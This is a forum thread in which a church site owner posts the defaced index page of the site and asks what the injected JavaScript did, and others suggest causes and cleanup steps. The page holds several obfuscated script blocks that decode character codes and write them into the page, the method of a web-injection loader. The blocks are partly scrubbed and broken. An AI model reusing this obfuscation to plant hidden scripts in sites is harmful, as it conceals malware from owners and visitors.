I think one of my Sites got hijacked
www.cedarcreekame.org index.htm file just have a redirection in it to another file
I noticed a bunch of java Scripts running when I went there on someone's else pc (and now mines). I have reloaded the original. but I wanted to know if anyone can tell me what the following code did. Did it install anything, get any info off the PCs, and if So What do I need to Do to remove and harm it did.

Here is the Complete file. (I've also Asked POWWEB for insight on this)
Have anyone else notice any changes in there files. all the JAVA script was added
Thanks

Henry

>
>

<head>
<meta http-equiv="REFRESH" content="5;URL=http://www.cedarcreekame.org/ccquide.htm">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>index.htm - Redirecting</title>
<base target="_self">
</head>

<p>Please Wait ,&nbsp;&nbsp; REDIRECTING .......</p>
<p>&nbsp;</p>

<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='0';s+='01';s=s+'02';s=s+'101062';t='';l=s .length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str ing.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='03';s+='08';s=s+'014';s=s+'09';s=s+'10106 2';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str ing.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='7062';s+='8';s=s+'4';s=s+'109';s=s+'10106 2';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str ing.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='02';s+=;s=s+'031;s=s+'101062';t='';l=s.le ngth;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str ing.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='06004711662';s+='06048';s=s+'03214';s=s+' 109';s=s+'162';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str ing.fromCharCode(t));t='';}}nbsp();</script>

I've removed the actual script but left the method visible.

Keyplyr is correct, the main thing is to work out how they inserted the script into your page, or added an index page to your account.

How old is your account?
Did you ever set up any other FTP accounts?

Old PowerWeb made your extra FTP account have higher level access.

Meaning the folder for the FTP would be above htdocs and not below it.

I still had an old one set up I done forgot about and got hacked like that last year.
They came in via the higher level directory and were able to install files that way.

Someone hijacked a church website?! May they burn in hell! That is really sick.

Looks like a hole with Invision Powerboard forum. I found this on another website:

For how to delete it (if you have your own Invision board)

Log in as an Admin, then click the Look & Feel tab.

Do the menu for the IPB Default Skin on the right side, and pick the "HTML Header & Footer Wrapper" item.

Look towards the bottom for where the trojan is added. Delete it (ours were in an IFRAME).


You'll also have to check on the Admin tab to make sure your board software is up to date...if not, you need to follow their directions to upload and run the updater.